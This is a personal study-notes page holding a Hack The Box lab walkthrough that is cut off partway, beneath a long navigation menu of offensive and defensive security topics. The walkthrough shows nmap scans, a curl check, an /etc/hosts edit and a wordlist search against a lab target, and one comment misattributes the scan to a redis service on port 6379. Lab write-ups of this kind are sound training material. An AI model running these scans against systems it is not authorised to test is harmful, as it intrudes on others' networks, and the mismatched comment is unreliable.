CND
  • CND
    • WHOAMI
    • PROJECTS
      • DEV
        • PERSONAL WEBSITE
        • GITHUB
          • CONVERTERS
          • CALCULATORS
        • ARDUINO
        • CTFD
        • AUTOMATION
          • ANSIBLE
          • TERRAFORM
      • CYBER
        • PERSONAL CYBER RANGE
    • SELF DEVELOPMENT
      • TRAINING PLATFORMS
      • PREP MATERIALS
        • OPERATOR DEVELOPMENT & INTEGRATION EFFORT (ODIE) ASSESSMENT
        • COMPUTER NETWORK ASSESSMENT BATTERY (CNAB)
        • COMPUTER NETWORK OPERATIONS QUALIFICATION COURSE (CNOQC)
        • COMPUTER NETWORK OPERATIONS DEVELOPMENT PROGRAM (CNODP)
        • DATA ENGINEER
        • CYBER COMMON TECHNICAL CORE (CCTC)
      • WRITEUPS/WALKTHROUGHS
        • HTB ACADEMY
          • 01.BUG BOUNTY HUNTER
          • 02.PENETRATION TESTER
        • HTB LABS
          • STARTING POINT
            • TIER 0
              • 01.MEOW (TELNET)
              • 02.FAWN (FTP)
              • 03.DANCING (SMB)
              • 04.REDEEMER (REDIS DB - ANONYMOUS ACCESS)
              • 05.EXPLOSION (RDP - WEAK CREDS)
              • 06.PREIGNITION (WEB FORM LOGIN)
              • 07.MONGOD (MONGODB)
              • 08.SYNCED (RSYNC)
            • TIER 1
              • 01.APPOINTMENT (SQL INJECTION)
              • 02.SEQUEL (MYSQL)
              • 03.CROCODILE (FTP & WEB FORM LOGIN)
              • 04.RESPONDER (RFI, NTLM CAPTURE, PW CRACKING & WINRM)
              • 05.THREE (AWS S3 BUCKET)
              • 06.IGNITION (DIRECTORY ENUMERATION & BRUTE FORCE)
              • 07.BIKE (SSTI)
              • 08.FUNNEL (PASSWORD SPRAYING & LOCAL PORT FORWARDING)
              • 09.PENNYWORTH (GROOVY SCRIPTING & REVERSE SHELL)
              • 10.TACTICS (SMB)
            • TIER 2
              • 01.ARCHETYPE (PRIVESC & MSSQL SERVER)
              • 02.OOPSIE
              • 03.VACCINE
              • 04.UNIFIED
              • 04.INCLUDED
              • 05.MARKUP
              • 06.BASE
          • INTRO TO BLUE TEAM
            • BRUTUS (SSH)
            • BFT (MFT)
            • UNIT42 (SYSMON/EVENT LOGS)
            • I-LIKE-TO
        • THM
          • ADVENT OF CYBER
            • 2024
            • 2023
            • 2022
          • SOC LEVEL 1
            • PRACTICAL EXERCISES
              • NETWORK SECURITY & TRAFFIC ANALYSIS
                • SNORT
                • NETWORK MINER
                • ZEEK
                • BRIM
                • WIRESHARK: BASICS
                • WIRESHARK: PACKET OPERATIONS
                • WIRESHARK: TRAFFIC ANALYSIS
                • TSHARK: THE BASICS
                • TSHARK: CLI WIRESHARK FEATURES
              • ENDPOINT SECURITY MONITORING
                • INTRO TO ENDPOINT SECURITY
            • SKILLS ASSESSMENT
              • NETWORK SECURITY & TRAFFIC ANALYSIS
                • SNORT CHALLENGE (BASICS)
                • SNORT CHALLENGE (LIVE ATTACKS)
                • ZEEK EXERCISES
                • TSHARK CHALLENGE I: TEAMWORK
                • TSHARK CHALLENGE II: DIRECTORY
              • ENDPOINT SECURITY MONITORING
        • HOLIDAY HACK CHALLENGE (SANS)
          • 2024:SNOW-MAGGEDON
      • PROVING GROUNDS
        • ADVENT OF CYBER: SIDE QUEST (THM)
          • 2024
        • CMU
        • CYBER FLAG
        • PRESIDENT'S CUP
        • MEC-T
      • COLLEGE
        • 03.DAKOTA STATE UNIVERSITY (DSU)
          • 2025
            • 01.CSC428: REVERSE ENGINEERING
          • 2024
            • 01.CSC314: ASSEMBLY LANGUAGE
            • 02.CSC300: DATA STRUCTURES
              • 01.C++ OVERVIEW: CLASSES & DATA ABSTRACTION
              • 02.OBJECT ORIENTED DESIGN & C++
              • 03.POINTERS
              • 04.ARRAY-BASED LIST
              • 05.LINKED LISTS
              • 06.DOUBLY LINKED LIST
              • 07.STACKS
              • 08.QUEUES
              • 09.BINARY TREES
          • 2023
            • 01.CSC250: COMPUTER SCIENCE II
            • 02.CSC334: WEB DEVELOPMENT
            • 03.MATH201: INTRODUCTION TO DISCRETE MATHEMATICS
        • 02.UNIVERSITY OF ARIZONA (UA)
        • 01.TECHNICAL COLLEGE OF THE LOWCOUNTRY
          • 2010
          • 2009
      • NOTES
  • PLAYBOOK
    • DCO
      • 01.PRE-ENGAGEMENT
        • PLAN
          • PDSS
            • 02.ROE
          • MISSION ANALYSIS
        • PREPARE
          • MPN
          • HSMC
            • 01.CTI
            • 02.DETECTION ENGINEERING
      • 02.ENGAGEMENT
        • EXECUTE
          • 01.PRE-HUNT
            • TAP/SENSOR DEPLOYMENT
          • 02.THREAT HUNTING
            • 01.TRAFFIC ANALYSIS
              • LOW-HANGING FRUIT
                • HOST IDENTIFICATION
                  • WIRESHARK
                  • TSHARK
                • CLEARTEXT CREDENTIALS
                  • WIRESHARK
                • CLEARTEXT PROTOCOLS
                  • WIRESHARK
                    • FTP ANALYSIS
                    • HTTP ANALYSIS
                    • LOG4J ANALYSIS
                • DNS QUERIES
                  • TSHARK
                • USER-AGENTS
                  • TSHARK
              • PORT SCANS
                • WIRESHARK
                • KIBANA
                • SPLUNK
              • ARP POISONING
                • WIRESHARK
              • TUNNELING (DNS/ICP)
                • WIRESHARK
                  • ICMP TUNNELING
                  • DNS TUNNELING
              • ENCRYPTED PROTOCOLS
                • WIRESHARK
                  • HTTPS ANALYSIS
                    • SNI INSPECTION
                    • ENCRYPTION KEY LOG FILE
            • 02.LOG ANALYSIS
          • INCIDENT RESPONSE
            • 01.PREPARATION
            • 02.IDENTIFICATION
            • 03.CONTAINMENT
            • 04.ERADICATION
            • 05.RECOVERY
            • 06.LESSONS LEARNED
          • FORENSICS
            • 01.ACQUISITION
            • MALWARE ANALYSIS
            • REVERSE ENGINEERING
        • ASSESS
      • 03.POST-ENGAGEMENT
        • DEBRIEF
        • DOCUMENTATION
          • MISSION DEFENSE PLAN/RISK MITIGATION PLAN
            • VULNERABILITY GUIDE
    • OCO
      • 01.PRE-ENGAGEMENT
        • 01.PDSS
        • 02.ROE
        • 03.RESOURCE DEVELOPMENT
          • 01.INFRASTRUCTURE DEVELOPMENT
          • 02.MALWARE DEVELOPMENT
          • 03.EXPLOIT DEVELOPMENT
      • 02.ENGAGEMENT
        • 01.IN
          • 01.PRE-ACCESS
            • 01.VPN CONNECTION
            • 02.ANALYST LOGGING
            • 03.OPNOTES
          • 02.INITIAL ACCESS/FOOTHOLD
            • INFORMATION GATHERING
              • RECONNAISSANCE
              • VULNERABILITY ASSESSMENT
                • WEB SERVERS
                  • SOURCE CODE REVIEW
                  • VULNERABILITY IDENTIFICATION
                    • SEARCHSPLOIT
                    • EXPLOIT DB
                  • VULNERABILITY SCANNING
                    • NIKTO
                    • NMAP
            • WEAPONIZATION
              • OBFUSCATION
                • JAVASCRIPT
              • SHELLCODES
              • PASSWORDS/PINS
                • PINS
                • DICTIONARY
                • CUSTOM WORDLIST
                  • USERNAMES
                  • PASSWORDS
              • TROJANS
                • TROJAN BACKDOOR
              • MALICIOUS DOCUMENTS
                • MACRO EMBEDDING DOCX
              • SCRIPTS
                • ENUMERATION
                  • PYTHON
                    • PARAM-FUZZER.PY
                  • BASH
                • WSDL
                  • SQLI
                  • CMD INJECTION
            • DELIVERY
              • SOCIAL ENGINEERING
              • WATERING HOLE
              • SUPPLY CHAIN
              • FILE XFER: INGRESS (UTILITY-BASED)
                • PYTHON HTTP SERVER
                  • WGET/CURL
                • SCP
                • COPY/PASTE
                  • BASE64 ENCODED XFER
            • EXPLOITATION
              • TYPE
                • INJECTIONS
                  • CLIENT-SIDE
                    • CROSS-SITE SCRIPTING (XSS)
                      • XSS DISCOVERY
                        • XSS TESTING (MANUAL)
                        • XSS TESTING (HYBRID)
                      • WEBPAGE DEFACEMENT
                      • XSS PHISHING
                      • XSS SESSION HIJACKING (AKA COOKIE STEALING)
                        • BASIC XSS TESTS
                        • OBTAINING SESSION COOKIES (PHP SERVER)
                        • OBTAINING SESSION COOKIES (NETCAT SERVER)
                    • SQL INJECTION (SQLI)
                      • 01.SQLI DISCOVERY
                        • 01.SQLI TESTING (MANUAL)
                          • URL PARAMETER METHOD
                          • LOGIN FORMS
                        • 01.SQLI TESTING (HYBRID)
                          • SQLMAP
                        • 02.SQLI LOCATION IDENTIFICATION
                      • 02.SQLI DB ENUMERATION
                      • AUTHENTICATION BYPASS
                      • CREDENTIAL DUMPING
                      • SQLI READING FILES
                      • SQLI WRITING WEB SHELL FILES
                    • COMMAND INJECTION
                      • 01.DISCOVERY
                      • FILTER EVASION/BYPASS
                        • FRONT-END VALIDATION: CUSTOMIZED HTTP REQUEST
                        • SPACE & NEW LINE CHARACTERS
                        • SLASH & BACKSLASH
                        • BLACKLISTED CHARACTERS
                        • BLACKLISTED CMDS
                        • ADVANCED CMD OBFUSCATION
                      • EVASION TOOLS
                    • HTML INJECTION
                    • XML EXTERNAL EXTITY (XXE)
                      • DISCOVERY
                        • WINDOWS
                      • INFORMATION DISCLOSURE
                      • INFORMATION TAMPERING
                        • RCE
                      • EXFILTRATION
                        • OOB BLIND DATA EXFIL
                          • XXEINJECTOR (AUTOMATED)
                      • IMPACT
                        • DOS
                    • CROSS-SITE REQUEST FORGERY (CSRF/XSRF)
                      • DISCOVERY
                      • CSRF BYPASS
                      • TRIGGERS
                        • W/O ANTI-CSRF TOKEN
                        • WITH ANTI-CSRF TOKEN (GET METHOD)
                        • WITH ANTI-CSRF TOKEN (POST METHOD)
                        • CHAINING (XSS & CSRF)
                          • MAKING PROFILE PUBLIC
                          • ADDING A FUNCTION TO THE PROFILE PAGE
                        • WEAK CSRF TOKENS
                  • SERVER-SIDE
                    • SSRF
                      • 01.DISCOVERY
                        • BLIND SSRF
                      • ENUMERATION
                      • LFI
                    • SSTI
                      • IDENTIFICATION
                      • JINJA (EXPLOITATION)
                      • TWIG (EXPLOITATION)
                      • HANDLEBARS NODEJS (EXPLOITATION)
                        • PAYLOAD
                    • SSI INJECTION
                      • SSI (EXPLOITATION)
                    • XSLT INJECTION
                      • IDENTIFICATION
                      • XSLT INJECTION (EXPLOITATION)
                • FILE UPLOADS
                  • 01.DISCOVERY
                  • FILTER EVASION/BYPASS
                    • CLIENT-SIDE VALIDATION
                      • BACK-END REQUEST MODIFICATION
                      • DISABLING FRONT-END VALIDATION
                    • BACK-END VALIDATION
                      • BLACKLIST EXTENSION FILTERS
                      • WHITELIST EXTENSION FILTERS
                      • CONTENT TYPE FILTER
                  • UPLOAD EXPLOITATION
                    • WEB SHELL
                      • CUSTOM WEB SHELLS
                        • PHP WEB SHELL
                        • .NET WEB SHELL
                        • HTML FORM SHELL
                    • REVERSE SHELLS
                      • CUSTOM REVERSE SHELLS
                    • LIMITED FILE UPLOADS
                      • EMBEDDED JAVASCRIPT (XSS)
                      • XML EXTERNAL ENTITY (XXE)
                    • TFTP
                  • ARBITRARY FILE UPLOAD
                • BRUTE FORCE
                  • WEB
                    • BASIC HTTP AUTHENTICATION
                    • WEB LOGIN FORMS
                      • HYDRA
                      • FFUF
                    • PASSWORD RESET: TOKENS
                    • 2FA
                    • LOW-HANGING FRUIT
                      • EMPTY/DEFAULT PWS
                      • DEFAULT CREDENTIALS
                    • PASSWORD RESET: SECURITY QUESTIONS
                    • PIN CRACKING
                    • SESSION TOKENS
                      • IDENTIFICATION
                      • TAMPERING/FORGING SESSION TOKENS
                  • EXPOSED SERVICES
                    • SSH
                    • FTP
                    • RDP
                    • SMB
                    • SNMP
                  • PASSWORD CRACKING (OFFLINE)
                    • HASH IDENTIFICATION
                    • JOHN THE RIPPER
                    • HASHCAT
                • AUTHENTICATION BYPASS
                  • DIRECT ACCESS
                  • PARAMETER MODIFICATION
                  • HTTP VERB TAMPERING
                    • INSECURE CONFIGURATION
                    • INSECURE CODING
                  • SESSION ATTACKS
                    • SESSION HIJACKING
                    • SESSION FIXATION
                      • DISCOVERY
                • WI-FI
                  • WPA/WPA2 CRACKING
                • IDOR
                  • IDENTIFICATION
                  • INFORMATION DISCLOSURE
                    • PLAINTEXT REFERENCES
                    • PARAMETER MANIPULATION & COOKIE TAMPERING
                    • ENCODED REFERENCES
                  • INFORMATION ALTERATION
                    • INSECURE FUNCTION CALLS
                • FILE INCLUSION
                  • LFI
                    • DISCOVERY
                      • FUZZING FOR LFI PAYLOADS (AUTOMATED)
                        • EXTRA PAYLOADS
                    • BASIC BYPASSES
                    • SOURCE CODE DISCLOSURE
                    • RCE
                      • FILE UPLOADS
                      • LOG FILE POISONING
                        • PHP SESSION POISONING
                        • SERVER LOG POISONING
                  • RFI
                    • DISCOVERY
                    • RCE
                • OPEN REDIRECT
                  • DISCOVERY
                  • CREDENTIAL THEFT
                • RCE MS SQL
              • CVE
            • DEFENSE EVASION
            • PERSISTENCE
              • SSH DIRECTORY
            • COMMAND & CONTROL
              • SHELLS
                • BIND SHELL
                  • BASH
                  • PYTHON
                  • POWERSHELL
                • REVERSE SHELL
                  • BASH
                  • PHP
                  • POWERSHELL
                  • GROOVY (JENKINS)
                • WEB SHELL
                  • PHP
                  • JSP
                  • ASP
                • SSH
              • INTERACTIVE SHELLS
        • 02.THROUGH
          • DISCOVERY
            • 01.HOST
            • 02.SERVICES
            • 02.VULNERABILITY ASSESSMENT
          • ENUMERATION
            • SYSTEM ENUMERATION
              • WINPEAS
          • PRIVILEGE ESCALATION
            • WINDOWS
              • IDENTIFICATION
                • AUTOMATED SCRIPTS
                  • WINPEAS
                  • SEATBELT
                  • JAWS
              • EXECUTION
                • BATCH FILES
                • PSEXEC.PY
                • EXPOSED CREDENTIALS
                  • WEBROOTS
            • LINUX
              • IDENTIFICATION
                • AUTOMATED SCRIPTS
                  • LINENUM
                  • LINUXPRIVCHECKER
                  • LINPEAS
              • EXECUTION
                • EXPOSED CREDENTIALS
                  • WEBROOTS
                • MISCONFIGURATIONS
                  • SETUID
                  • VI
                  • SSH DIRECTORY
                  • SUDOERS
                • SCHEDULED TASKS
                  • CRON JOBS
          • EXECUTION
          • CREDENTIAL ACCESS
            • SESSION HIJACKING
            • PASSWORD CRACKING
              • JOHN THE RIPPER
                • CRACKING ENCRYPTED FILES (ZIP)
                • CRACKING ENCRYPTED FILES (PDF)
              • HASHCAT
                • CRACKING MD5 HASHES
          • LATERAL MOVEMENT
            • NETWORK PIVOTING
              • PORT FORWARDING
                • LOCAL PORT FORWARDING
              • TUNNELING
        • 03.OUT
          • COLLECTION
          • EXFILTRATION
            • SCP
          • IMPACT
            • DOS
              • XXE PAYLOAD DOS
              • DECOMPRESSION BOMB
              • PIXEL FLOOD
              • REGEX DOS
                • DISCOVERY
            • TIMING ATTACKS
              • RACE CONDITIONS
            • MITM
              • WEBSOCKETS
          • OBJECTIVES
      • 03.POST-ENGAGEMENT
        • 00.BDA
        • 01.ARTIFACT CLEARING
        • 02.INFRASTRUCTURE RESET
        • 03.DEBRIEF
          • INTERNAL
          • EXTERNAL
        • 04.DOCUMENTATION
          • REPORT
        • 05.LESSONS LEARNED
    • DEV
      • C
    • SRE
      • REVERSE ENGINEERING
        • ANALYSIS
          • 01.REBASING: IDENTIFYING BASE ADDRESS (IF REQUIRED)
          • 02.IDENTIFYING MAIN() IN STRIPPED BINARIES
          • 03.IDENTIFYING GLOBAL VARIABLES
          • C CODE CONSTRUCTS IN ASSEMBLY
            • GLOBAL & LOCAL VARIABLES
            • ARITHMETIC OPERATIONS
            • FUNCTION CALLS
            • ARRAYS
            • STRUCTS
            • LINKED-LIST TRAVERSAL
            • FLOW CONTROL
              • IF STATEMENTS
              • SWITCH STATEMENTS
              • LOOPS
        • STRING PATCHING
        • BINARY PATCHING
        • STACK MAPPING
      • ANTI-DEBUGGING
      • SOFTWARE EXPLOITATION
        • STACK REDIRECTION
        • SHELLCODE
        • DISASSEMBLER/GHIDRA SCRIPTING
        • FORMAT STRINGS
        • ENVIRONMENT VARS
        • BUFFER OVERFLOWS
          • DISABLING ASLR (LINUX)
        • VULNERABLE C FUNCTIONS
  • ENGINEERING
    • INSTALLATION PROCEDURES
    • CONFIGURATION PROCEDURES
      • WEB
        • BASIC HTTP AUTHENTICATION
        • CSRF PROTECTED FORM
      • NETWORKING
        • CISCO SWITCH
          • VLAN TRUNKS
          • PORT SECURITY
        • CISCO ROUTER
  • SYSTEM ADMINISTRATION
    • LINUX
      • NETWORKING
        • RESTART NETWORK SERVICES
        • LOCAL DNS RESOLUTION
      • LOCATING
      • FILE SHARING
      • PACKAGES
        • NORDVPN
      • OS
        • KALI
    • WINDOWS
      • DISK PARTITIONING
        • DISKPART
      • ACTIVE DIRECTORY
        • PASSWORD
        • DOMAIN USER
      • OPEN SSH
        • PRIVATE KEY PERMISSIONS
      • LOCAL DNS RESOLUTION
  • TOOLING
    • DCO
      • CYBER THREAT INTELLIGENCE (CTI)
        • OPENCTI
        • MALWARE INFORMATION SHARING PLATFORM (MISP)
      • DETECTION ENGINEERING
        • HOST
          • NETWORK MINER
        • NETWORK
          • SNORT
            • SELF-TEST MODE
            • SNIFFER MODE
            • PACKET LOGGER MODE
            • IDS/IPS MODE
            • PCAP READING MODE
            • RULE WRITING
              • SAMPLE RULES
              • MAGIC NUMBERS
      • THREAT HUNTING
        • NETWORK ANALYSIS
          • IDS/IPS
            • SNORT
            • SURICATA
          • PACKET ANALYZER
            • WIRESHARK
              • MERGING PCAPS
              • FINDING SPECIFIC STRINGS/PACKETS
              • EXPORTING PACKETS
              • EXPORTING OBJECTS
              • CREATING PROFILES
              • BOOKMARKING FILTERS
              • PACKET FILTERING
                • OPERATORS & FUNCTIONS
                • PROTOCOL FILTERS
                  • IP FILTERS
                  • TCP/UDP FILTERS
                  • APPLICATION FILTERS
                • FILTER BUILDER
              • CREATING FW RULES
            • TSHARK
              • SNIFFING TRAFFIC
                • CAPTURE FILTERS
              • READING CAPTURE FILE
                • DISPLAY FILTERS
                • OUTPUT FORMAT SELECTOR
              • FOLLOWING DATA STREAMS
              • EXTRACTING DATA
              • PACKET FILTERING
                • DISPLAYING PACKET STATISTICS
                • ADVANCED FILTERING
            • TCPDUMP
              • EXTRACTING INFORMATION
          • SIEM
            • ELASTIC STACK
            • SECURITY ONION
            • SPLUNK
          • NSM
            • ZEEK
              • MODES
              • LOGS
              • SIGNATURES
                • HTTP CLEARTEXT PASSWORD DETECTION
                • FTP BRUTE FORCE DETECTION
              • SCRIPTING
              • EVENT CORRELATION
              • FRAMEWORK
                • FILE FRAMEWORK | HASHES
                • FILE FRAMEWORK | EXTRACT FILES
                • NOTICE FRAMEWORK | INTELLIGENCE
                • CLEARTEXT SUBMISSION OF PWDS
                • GEO-LOCATION DATA
              • PACKAGES
        • HOST ANALYSIS
          • YARA
          • FLOSS
          • BRIM
            • QUERIES
            • QUERY REFERENCE
          • SYSINTERNALS
            • TCPVIEW
            • PROCESS EXPLORER
            • SYSMON
              • EXAMPLE CONFIGURATION FILE
              • IMPORTANT EVENT-IDS
          • POWERSHELL
          • WINDOWS EVENT LOGS
            • EXPORTING LOGS
          • OSQUERY
          • EDR
            • WAZUH
      • DFIR
        • EXIFTOOL
        • NETWORK FORENSICS
          • NETWORK MINER
        • FILE SYSTEM
          • MFTECMD
          • TIMELINE EXPLORER
      • ATOMIC RED TEAM
      • UTILITIES
        • JQ
        • .NET SDK
      • REVERSE ENGINEERING
        • DISASSEMBLERS
          • RADARE2
          • GHIDRA
          • IDA PRO
          • BINARY NINJA
          • CUTTER
          • HOPPER
        • DEBUGGERS
          • GDB/GEF
          • GEF
          • X64DBG
          • WINDBG
    • OCO
      • C2
        • COBALT STRIKE
        • SLIVER
        • MYTHIC C2
          • INSTALLATION
            • ON-PREMISE
            • AWS EC2
            • AZURE
          • C2 PROFILES
            • HTTP
          • AGENTS
            • WINDOWS
          • PAYLOAD CREATION
            • AWS CLOUDFRONT IMPLEMENTATION
            • AZURE FRONT DOOR IMPLEMENTATION
            • NGINX CONDITIONAL REDIRECTION IMPLEMENTATION
        • MITRE CALDERA
          • ON-PREMISE
        • HAVOC C2
        • METASPLOIT
      • VPS
        • REDIRECTORS
          • AWS CLOUDFRONT
            • LOAD BALANCER (AWS EC2)
            • CLOUDFRONT
              • GEO RESTRICTION (OPSEC)
          • AZURE FRONT DOOR
            • FRONT DOOR
          • NGINX (AWS EC2/AZURE)
            • C2 AGENT/USER-AGENT CONDITIONAL REDIRECTION (OPSEC)
              • NGINX FW RULE
              • C2 SERVER FW RULE
            • DIRECTORY REDIRECTION (OPSEC)
          • NGINX (ON-PREMISE)
        • PAYLOAD SERVER
          • NGINX (AWS EC2/AZURE)
            • FW RULES
            • CONFIGURATION
              • FACADE FILES
          • PWNDROP
        • PHISHING SERVER
          • EVILGINX (AWS EC2/AZURE)
            • FW RULES
            • HOMOGRAPHS
            • TRIGGERS
              • CREDENTIAL HARVESTING
              • MFA BYPASS
          • GOPHISH
            • FW RULES
            • CONFIGURATION
            • CAMPAIGNS
            • TRIGGERS
              • MALICIOUS DOWNLOADS
      • WIFI
        • ALFA AWUS1900 WIRELESS ADAPTER
          • DRIVERS
      • OSINT
        • FINAL RECON
        • RECON-NG
        • THE HARVESTER
        • SPIDERFOOT
        • OSINT FRAMEWORK
      • UTILITIES
        • 7ZIP
        • BROWSER DEVTOOLS
        • CADAVER
        • CURL
        • CUSTOM WORDLIST
          • USERNAME ANARCHY
          • CUPP
        • DATABASE
          • MYSQL
          • PSQL
        • DIG
        • DNSENUM
        • FIND
        • FTP
        • HTML2TEXT
        • IMPACKET
          • PSEXEC.PY
          • MSSQLCLIENT.PY
        • MULTI-FUNCTION
        • NETCAT
        • NETSTAT
        • NMAP
        • OPENVPN
        • PASSWORD
          • BRUTE FORCE (ONLINE)
            • HYDRA
            • MEDUSA
            • FFUF
            • CRACKMAPEXEC (SMB, ETC)
          • CRACKING (OFFLINE)
            • HASH-ID.PY
            • HASHID
            • JOHN THE RIPPER
            • HASHCAT
        • PRIVESC
          • WINPEAS
        • PROXIES
          • WRAPPER
            • PROXYCHAINS
          • WEB PROXIES
            • BURP SUITE
              • SETTINGS
              • WEB CRAWLING
            • ZED ATTACK PROXY (ZAP)
          • BROWSER PROXIES
            • FIREFOX
            • EXTENSIONS
              • FOXY PROXY
              • PROXY SWITCHYOMEGA (BRAVE BROWSER)
        • REMOTE ACCESS
          • FREERDP
        • RESPONDER
        • RSYNC
        • SCRIPT
        • SEARCHSPLOIT
        • SMBCLIENT
        • SOCAT
        • SQLMAP
          • GET REQUESTS
          • POST REQUESTS
          • BYPASSING WEBAPP PROTECTIONS
            • TAMPER SCRIPTS
          • OS EXPLOITATION
          • SQLI
            • CMD INJECTION
        • SSH
        • SSTIMAP
        • TAC
        • TECHNOLOGY PROFILER
          • WAPPALYZER
        • TEE
        • TMUX
        • TREE
        • VI/VIM
        • WEB CONTENT DISCOVERY
          • GOBUSTER
          • DIRB
        • WGET
        • WPSCAN
        • SNMPWALK
        • ONESIXTYONE
      • RANGE
        • TARGETS
          • DVWA
          • VULNHUB
          • DVLLMA
          • OWASP JUICE SHOP
          • METASPLOITABLE 2
          • METASPLOITABLE 3
    • DEV
      • FUNDAMENTALS
        • NUMBER SYSTEM
          • CONVERSIONS
          • COMPLEMENTS
      • LANGUAGES
        • ASSEMBLY
          • TEMPLATE
        • C
          • TEMPLATE
          • SYNTAX
            • FUNDAMENTALS
              • BOOLEANS
              • TYPEDEF
              • ENUM
              • SIZEOF
              • ARRAYS
              • ADDRESS-OF
              • DEREFERENCE
              • CHARACTER STRINGS
          • OPERATORS
          • KEYWORDS
          • FORMAT SPECIFIERS
          • ENCODING SCHEMES
          • BARR C CODING STANDARD
          • TROUBLESHOOTING
            • SUPPRESSING SECURITY WARNINGS
          • TYPE MODIFIERS
          • FUNCTION PROTOTYPES
            • BUILT-IN
              • STRING.H
                • STRLEN()
                • STRCPY()
                • STRNCPY()
                • STRCAT()
              • STDLIB.H
                • FREE()
                • MALLOC()
              • STDBOOL.H
              • STDIO.H
                • PRINTF()
                • SNPRINTF()
        • PYTHON
          • TEMPLATE
        • HTML
          • URL ENCODING
        • C++
      • COMPILERS
        • COMPILER EXPLORER (ONLINE)
        • GCC (LINUX)
        • VISUAL STUDIO CLI (WINDOWS)
      • UTILITIES
        • HEXDUMP
        • CODE BEAUTIFY
        • GIT (CLI)
        • STYLE FORMATTING
          • CLANG-FORMAT
          • CLANG-FORMAT-BARR-C
        • IDE
          • ARDUINO
  • RESOURCES
    • ARMY
      • 350-1
      • CAC PKI CERTIFICATES RECOVERY
      • FORCE MANAGEMENT
      • DEFENSE ACQUISITION TRAININGS
      • CAREER MANAGEMENT
      • COLLECTION
        • MISC
        • COMMANDS
        • TRAINING
      • MILITARY RETIREMENT
        • CHECKLIST
        • RESUME
    • CYBER
      • DCO
        • CYBER THREAT EMULATION
        • SYSTEM HARDENING
        • MALWARE ANALYSIS
          • MALWARE BAZAAR
          • MALWARE TRAFFIC ANALYSIS.NET
          • THE ZOO (AKA MALWARE DB)
        • THREAT HUNTING
          • MITRE ATT&CK
          • MITRE ATTACK FLOW BUILDER
          • MITRE CAR
          • MITRE D3FEND
          • MITRE ENGAGE
          • MITRE ENGENUITY
          • ULTIMATE WINDOWS SECURITY
          • TECHNIQUE INTERFACE ENGINE
      • OCO
        • NETWORK PIVOTING
          • THE CYBER PLUMBER'S LAB GUIDE
        • BUG BOUNTY PROGRAMS
        • LIVING OFF THE LAND
          • LOLBAS (WINDOWS)
          • GTFOBINS (UNIX)
          • LOLDRIVERS (WINDOWS)
          • LOLAPPS
        • RECONNAISSANCE
          • WAYBACK MACHINE
          • SHODAN
          • CENSYS
        • VULNERABILITY/EXPLOIT LISTINGS
          • EXPLOIT DB
          • VULNERABILITY LAB
      • OT
        • ICS/SCADA
      • GENERAL
        • GENERATIVE AI/COPILOT
          • CAMOGPT
          • CHATGPT
          • PENTESTGPT
        • UNIFIED KILLCHAIN (UKC)
        • BLOGS
    • AUDIO
Powered by GitBook
On this page
  • ENUMERATE SERVICES
  • VULNERABILITY SCANNING
  • FOOTHOLD/COMPROMISE
  1. CND
  2. SELF DEVELOPMENT
  3. WRITEUPS/WALKTHROUGHS
  4. HTB LABS
  5. STARTING POINT
  6. TIER 1

06.IGNITION (DIRECTORY ENUMERATION & BRUTE FORCE)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 80/tcp open  http    nginx 1.14.2
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80
 PORT   STATE SERVICE VERSION
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Did not follow redirect to http://ignition.htb/

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80
 PORT   STATE SERVICE
 80/tcp open  http
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-enum: 
 |   /setup/: Potentially interesting folder
 |_  /soap/: Potentially interesting folder

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag
#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}
 Hmm. We’re having trouble finding that site.
 We can’t connect to the server at ignition.htb.
 
 * ip address redirected to http://ignition.htb
 
root@htb:~$ curl -v {targetIP:port}
 *   Trying 10.129.208.53:80...
 * Connected to 10.129.208.53 (10.129.208.53) port 80 (#0)
 > GET / HTTP/1.1
 > Host: 10.129.208.53
 > User-Agent: curl/7.88.1
 > Accept: */*
 > 
 < HTTP/1.1 302 Found
 < Server: nginx/1.14.2
 < Date: Sat, 22 Feb 2025 12:37:38 GMT
 < Content-Type: text/html; charset=UTF-8
 < Transfer-Encoding: chunked
 < Connection: keep-alive
 < Set-Cookie: PHPSESSID=5377km0035lm9f1hpf62b1a5q8; expires=Sat, 22-Feb-2025 13:37:38 GMT; Max-Age=3600; path=/; domain=10.129.208.53; HttpOnly; SameSite=Lax
 < Location: http://ignition.htb/
 
 * target site is expecting a FQDN instead of IP Address as stated...
    - HTTP/1.1 302 Found...Location http://ignition.htb/
 
root@htb:~$ echo "10.129.208.53     ignition.htb" | sudo tee -a /etc/hosts
 10.129.208.53     ignition.htb
 
root@htb:~$ BROWSER > http://ignition.htb

 * possible vulnerable entry points
    - sign-in form
    - create account form
    - subcribe form
    - orders & returns form
    - contact web form
    - advanced search form
#directory enumeration
root@htb:~$ find / -iname directory-list* 2>/dev/null
 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt
 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
 /usr/share/dirbuster/wordlists/directory-list-1.0.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
